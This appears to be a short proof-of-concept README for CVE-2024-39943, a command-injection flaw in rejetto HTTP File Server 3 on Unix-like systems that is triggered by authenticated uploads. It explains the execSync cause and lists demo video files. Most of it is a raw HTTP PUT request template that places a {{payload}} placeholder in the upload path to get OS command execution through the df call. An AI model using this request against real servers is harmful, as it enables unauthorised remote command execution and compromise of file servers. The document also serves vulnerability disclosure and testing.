CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).
Deploy: ./hfs --config config.yaml
poc.mp4
poc_rce3.mp4
poc_rce2.mp4
PUT /tmp/{{payload}}/poc11.txt HTTP/1.1
Host: <host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cookie: {{Cookie}}
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
aaaaaaaaaaa